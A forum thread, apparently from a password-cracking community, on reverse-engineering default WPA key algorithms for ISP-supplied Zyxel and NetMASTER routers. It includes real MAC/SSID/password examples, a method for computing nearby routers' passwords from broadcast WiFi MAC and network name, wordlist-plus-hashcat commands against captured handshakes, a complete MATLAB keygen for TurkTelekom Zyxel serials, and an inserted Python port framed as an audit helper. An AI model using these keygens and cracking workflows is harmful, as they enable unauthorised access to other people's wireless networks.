Unpublished WPA key algorithms

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
THIS!!!
I was working on this exact project, but ran out of knowledge. I want to reverse engineer the default password generator for the Zyxel EMG2926 typically used by Videotron in Quebec. I want a simple keygen that you feed its WAN MAC address and it prints the default password. I have a bunch of Zyxel router default SSID/password/WAN MAC data if it can help anyone. I ended up bricking a router trying to extract its firmware. I got stuck there in my project and was hoping this forum thread would get revived.
For TurkTelekom Zyxel modems the key algorithm uses the serial number, not the MAC. It could also be the case for Videotron, maybe even close to the TT algo.
 

gurgen

Active member
Feedback: 0 / 0 / 0
Joined
Dec 30, 2019
Messages
113
Reaction score
10
Credits
88

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
Attached netmaster algo, it is easy and known for years
This did not work exactly; it ran, but the results were wrong.
For example, I have a few fc4ae9 router stock passwords.

mac = 'fc4ae9441327'

I checked fc4ae9441327 with this algo and it produced this pass = f7a9fae6, but this was wrong because the true pass is c2c357a5.

I tried 5 or 6 different MACs.

Can you please help me find where I made a mistake?

Thanks
 

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
You should use the CM MAC, not the WAN or WLAN MAC. It works as it should.
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
Thanks for your reply.
How can I calculate CM? What is it?

For example, I have some info:
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G --- real passes-> 5592499e

How can I verify these with that Python file?

I found this, but did not understand it.


Thanks for your help
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
--------------------------------------------------------------------------------------

I solved the system, but I have a problem.

From the WAN MAC it worked: for the MAC fc4ae964f113 it gives the true pass 42a371c5, but when I tried the CM MAC fc4ae964f111 it gives me the wrong pass.
Can you give me info about the CM MAC and WLAN MAC?
How can I find the real WLAN MAC? On some sites it says that the WLAN MAC is consecutive.
But in this example the CM MAC is fc4ae964F111 and the WAN MAC is fc4ae964F113.

How can I find the right WAN MAC?
And why did you say to use the CM MAC?

Thanks
 

Attachments

  • 29003b1b1c6607c1d77cc81a7fbea432.jpg (177.2 KB)

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
Well, you can't calculate the real CM MAC from the WAN or WLAN MAC. The best thing you can do is make a wordlist from fc4ae9000000 to fc4ae9ffffff and use that instead.
 

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
Sorry, my bad. I meant WAN MAC; CM MAC was for the wifi name calculation, I was confused. You need to use the WAN MAC, but you can't know the WAN MAC from the WLAN MAC exactly, so you should make a wordlist to make sure you have it all.
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51

Thanks for all your replies.
My English is not so good, but I want to follow the rules, so I will write in English.

I want to share this, and I have a question.

  • The Kablonet network name uses the last 4 digits of the modem's CM MAC address. For example, if the modem's CM MAC address is 11:22:33:44:55:66, the WiFi network name is computed as NetMASTER Uydunet-5566. This may look insignificant, but it is a very important information leak for the next point.
  • The WiFi password algorithm is computed using the device's WAN MAC address. Because on most devices the WAN and WLAN addresses follow one another, it is possible to compute the WAN address from the WiFi MAC address and the network name. Since you can see the WiFi MAC address and the network name without connecting, the WiFi passwords of all new-model NetMASTER modems nearby whose password has not been changed can be computed. The risk level by model is as follows:
    • The NetMASTER CBW-383ZN and NetMASTER Infinity 401 models can be computed from just the WiFi MAC address and network name, because the WiFi MAC and WAN MAC addresses are consecutive.
    • For the NetMASTER CBW-383Z4 model there are 256 possibilities, because the MAC address is not consecutive. However, 4 of the remaining 6 digits can be computed from the network name. That leaves us the possibilities between 0x00-0xFF to try.
    • On the NetMASTER CBW-700V model the WiFi MAC and WAN MAC addresses are completely different. I could not find a consecutive number between them, so we can say these modems are relatively safe.

First of all, in these examples


fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c

only the last digit changes! In the first example the wireless name is 1324 and the last 4 digits of the MAC are 1327, so the first 3 digits are the same. In this example the WAN MAC is between 24-27; I tested a few times on different wireless networks.

But in the third example, fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G, the last 2 digits are different. How can I solve this? You said that I should make a list, but how?
In the quote the writer says 256 possibilities.
fc4ae9b041?h?h, like this? I wonder about this. And how can I edit netmaster-psk.py? For example, I need fc4ae9b041?h?h; how can I extract the passes into an out.txt file? We need to modify netmaster-psk.py.

Thanks for everything.
 

SubZero5

Active member
Feedback: 0 / 0 / 0
Joined
Apr 23, 2020
Messages
284
Reaction score
19
Credits
3,051
Nowadays I see some NetMaster modems with changed MAC addresses...

I think a new firmware is pushed and the announced MacIDs are somehow shifted. I have some sample data but I am unavailable to analyze a firmware for an exact change methodology.

FC:4A:E9:xx:xx:xx became 18:48:59:yy:yy:yy
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
Nice, but you do know that GitHub exists for source code and projects alike :)
Nice,

but I did that just so people can pipe it into hashcat instead of downloading the files; note that there are some users who
1. don't know how to pipe into hashcat
2. don't know how to compile
3. don't even use hashcat and use other programs, and those other programs do accept wordlists.


By the way, are you planning to release TurkTelekom for T versions? aka TP-Link
Just use the pipe command |

gen.py | hashcat -m 2500 -a 0 cpature.hccapx


Hi, I have a problem and I hope someone can help me.
I tried this method.
gen_ttnet_zyxel gcc -Ofast -o gen_ttnet_zyxel gen_ttnet_zyxel.c md5-fast-x8664.S

I have Kali Linux's latest version.
I tried to create only 160Y, so I used this line: static char* prefixes[] = {"160Y"};

chmod +x gen_ttnet_zyxel
then
./gen_ttnet_zyxel > zyxelwordlist.dic

I created a dictionary which was about 750 MB.

But this list does not have all the keys. I checked 10 times! I compiled 10 times to find what the problem is.
The passes 5D5276a1f1332 and 08134838433Ff must be in it, but the created dictionary does not have them,
because 5D5276a1f1332 and 08134838433Ff are S160Y router keys!

What do you think the problem is? Why does the dict not have the right passwords?
I used this file

Thanks for your answers.
 

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
I've converted the TurkTelecom keygen to MATLAB, so if you want to build your own Python version it's pretty straightforward to do so. I added a few examples, so you can see if your code is on the right track.
Code:
function key=turkey_zyxel(sn)
% converted from c originally by gpuhash_me on hashkiller
% ref: https://forum.hashkiller.io/index.php?threads/unpublished-wpa-key-algorithms.19944/post-240582
% Default ESSID is TTNET_ZyXEL_XXXX or TurkTelecom_XXXXX
% Zyxel VMG3312-B10B and VGM3313-B10A
% hasher(str,'MD5') is a helper, not a MATLAB built-in: it must return the
% 16 digest bytes as integer values (0-255).

if nargin<1 % default serial number if none provided
    sn='S150Y13068675';
end

% 265 three-letter words (795 chars), indexed by the ASCII sum computed below
junk=['agnahaakeaksalmaltalvandanearmaskaspattbagbakbiebilbitblableblib'...
      'lyboabodbokbolbomborbrabrobrubudbuedaldamdegderdetdindisdraduedu'...
      'kdundypeggeieeikelgelvemueneengennertesseteettfeifemfilfinflofly'...
      'forfotfrafrifusfyrgengirglagregrogrygulhaihamhanhavheihelherhith'...
      'ivhoshovhuehukhunhushvaideildileinnionisejagjegjetjodjusjuvkaika'...
      'mkankarkleklikloknaknekokkorkrokrykulkunkurladlaglamlavletlimlin'...
      'livlomloslovluelunlurlutlydlynlyrlysmaimalmatmedmegmelmenmermilm'...
      'inmotmurmyemykmyrnamnednesnoknyenysoboobsoddodeoppordormoseospos'...
      'sostovnpaiparpekpenpepperpippopradrakramrarrasremrenrevrikrimrir'...
      'risrivromroprorrosrovrursagsaksalsausegseiselsensessilsinsivsjus'...
      'jyskiskoskysmisnesnusolsomsotspastistosumsussydsylsynsyvtaktalta'...
      'mtautidtietiltjatogtomtretuetunturukeullulvungurourtutevarvedveg'...
      'veivelvevvidvikvisvriyreyte'];

MD5_hash=hasher(sn,'MD5'); % results in 16 int values; in hex f49ab8d6ce27819152c99e926d1f1372 for the default SN
p='';
sum=0; % note: shadows the built-in sum() inside this function
for n=1:16
    byte=MD5_hash(n);
    c1=dec2hex(bitshift(byte,-4));   % high nibble converted to upper case hex (bitshift by 4 => divide by 16)
    c2=lower(dec2hex(mod(byte,16))); % low nibble converted to lower case hex
    if c1=='0' % a zero high nibble is replaced by a copy of the low nibble
        c1=c2;
    end
    p=[p c1 c2];
    sum=sum+double(c1)+double(c2);   % adds the ASCII values together
end
% sum is 2006 for the default SN
% p would be F49aB8D6Ce27819152C99e926d1f1372

i=mod(sum,265);
if bitand(sum,1) % check whether sum is odd
    s1=[lower(dec2hex(double(junk(1+i*3)),2)) lower(dec2hex(double(junk(2+i*3)),2)) lower(dec2hex(double(junk(3+i*3)),2))];
else
    s1=[dec2hex(double(junk(1+i*3)),2) dec2hex(double(junk(2+i*3)),2) dec2hex(double(junk(3+i*3)),2)];
end
% s1 = '6D7572' for the default serial number (upper case hex of the ASCII values of the letters picked out of junk)

s2=[p(1) s1(1:2) p(2:3) s1(3:4) p(4:6) s1(5:6) p(7:end)]; % weird alternating stitching of the hex digest and the junk hex
% s2 is F6D4975aB872D6Ce27819152C99e926d1f1372 for the default, note the mixed case

MD5_hash2=hasher(s2,'MD5');
hex_digest='';
for n=1:16
    hex_byte=dec2hex(MD5_hash2(n),2); % forces all upper case
    if hex_byte(1)=='0'
        hex_byte(1)=hex_byte(2); % copy the next char over if there is a leading zero
    end
    hex_digest=[hex_digest hex_byte];
end
for n=2:2:32
    hex_digest(n)=lower(hex_digest(n)); % alternate upper case and lower case
end
% default hash = 52AeC8568b91E1DcBcA5142e95Fd31F5
% correct password for the default sn = 1DcBcA5142e95
key=hex_digest(14:26); % select the key from the 14th char to the 26th
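
A Python port of the MATLAB function above, added here as an example (it is not drsnooker's or gpuhash_me's code): it reproduces the derivation step by step so a Zyxel owner or auditor can check whether a router's PSK is still the serial-derived default. It assumes only the standard library and the page's own test vector (S150Y13068675 -> 1DcBcA5142e95); the function names are my own.

```python
import hashlib

# 265 three-letter words (795 chars), copied from the MATLAB port above.
JUNK = (
    "agnahaakeaksalmaltalvandanearmaskaspattbagbakbiebilbitblableblib"
    "lyboabodbokbolbomborbrabrobrubudbuedaldamdegderdetdindisdraduedu"
    "kdundypeggeieeikelgelvemueneengennertesseteettfeifemfilfinflofly"
    "forfotfrafrifusfyrgengirglagregrogrygulhaihamhanhavheihelherhith"
    "ivhoshovhuehukhunhushvaideildileinnionisejagjegjetjodjusjuvkaika"
    "mkankarkleklikloknaknekokkorkrokrykulkunkurladlaglamlavletlimlin"
    "livlomloslovluelunlurlutlydlynlyrlysmaimalmatmedmegmelmenmermilm"
    "inmotmurmyemykmyrnamnednesnoknyenysoboobsoddodeoppordormoseospos"
    "sostovnpaiparpekpenpepperpippopradrakramrarrasremrenrevrikrimrir"
    "risrivromroprorrosrovrursagsaksalsausegseiselsensessilsinsivsjus"
    "jyskiskoskysmisnesnusolsomsotspastistosumsussydsylsynsyvtaktalta"
    "mtautidtietiltjatogtomtretuetunturukeullulvungurourtutevarvedveg"
    "veivelvevvidvikvisvriyreyte"
)

def _mixed_hex(digest):
    """High nibble upper-case, low nibble lower-case; a zero high nibble becomes
    a copy of the low nibble (as in the MATLAB port). Also returns the ASCII sum."""
    out, total = [], 0
    for b in digest:
        c1, c2 = "%X" % (b >> 4), "%x" % (b & 0xF)
        if c1 == "0":
            c1 = c2
        out.append(c1 + c2)
        total += ord(c1) + ord(c2)
    return "".join(out), total

def turkey_zyxel_key(sn):
    """Default WPA key derived from a TTNET/TurkTelekom Zyxel serial number."""
    p, total = _mixed_hex(hashlib.md5(sn.encode()).digest())
    word = JUNK[3 * (total % 265):3 * (total % 265) + 3]
    fmt = "%02x" if total & 1 else "%02X"  # odd sum -> lower-case hex of the word
    s1 = "".join(fmt % ord(ch) for ch in word)
    # Stitch the word's hex into the digest string at fixed offsets.
    s2 = p[0] + s1[0:2] + p[1:3] + s1[2:4] + p[3:6] + s1[4:6] + p[6:]
    h = hashlib.md5(s2.encode()).hexdigest().upper()
    pieces = [hb[1] * 2 if hb[0] == "0" else hb for hb in (h[k:k + 2] for k in range(0, 32, 2))]
    digest = "".join(pieces)
    # Even 1-indexed positions are lower-cased; chars 14..26 form the key.
    digest = "".join(c.lower() if k % 2 else c for k, c in enumerate(digest))
    return digest[13:26]

def still_on_default_key(sn, current_psk):
    """Audit helper: True when the PSK in use is still the derived default."""
    return current_psk == turkey_zyxel_key(sn)
```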
 

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
Thanks Dawbs. Here's the MATLAB conversion of Zykgen (keygen for the Zyxel VMG8823-B50B).
Note that I've completely gotten rid of the bibbidi bobbidi boo functions and some others after I figured out what they were actually doing. Again, it should be pretty easy to convert to Python if you are so inclined, but easier to handle than the Golang it was written in.
 

Attachments

  • zykgen.zip (1.8 KB)

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
If anybody still has a copy of the gen_telus.py that was attached in message 21, please send it to me. I want to see what else ZyXel had up their sleeves when it comes to generating those passwords.
 